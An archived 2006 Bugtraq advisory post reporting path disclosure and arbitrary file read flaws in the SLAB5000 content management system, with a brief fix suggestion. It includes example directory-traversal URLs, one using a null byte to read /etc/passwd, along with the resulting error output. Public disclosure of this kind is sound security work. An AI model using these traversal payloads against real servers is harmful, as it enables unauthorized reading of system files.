| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060318072309.23835.qmail@securityfocus.com> Date: 18 Mar 2006 07:23:09 -0000 From: justint@...ail.net To: bugtraq@...urityfocus.com Subject: Path Disclosure and Arbitrary File Read Vulnerability in SLAB5000 [Description] SLAB500 is a complete, dynamic, modular web-system designed to your specifications, allowing you to quickly and conveniently update all your content, add new pages, upload images, sounds and video from any browser, via our front-end interface from any location that you have web access. -- taken from they website http://www.slab5000.com -- I discover 2 bugs one known as "path disclosure" and Arbitrary File Read Vulnerability in the SLAB5000 Content Management System that allow malicious attacker to read sensitive information about the system. [Path Disclosure] Due to improper sanity checks in the variable $page: http://www.server.com/index.php?page=../../../var Warning: main(/usr/www/users/username/slab500/common/../../../var/index.php): failed to open stream: No such file or directory in /usr/www/users/usernameb/slab500/folder/index.php on line 63 [File Read] Due to imporper sanity inputs checks too, just adding the NULL byte and the end of the file: http://www.server.com/index.php?page=../../../../../etc/passwd%00 [Solution] Edit the source to do sanity input checks as well. Sorry if my english is bad :) Justin_T irc: #nt at Undernet shoutz: warcold, KrOsS, HoOH, lsdx, jsz, and all the guyz from DO.
Powered by blists - more mailing lists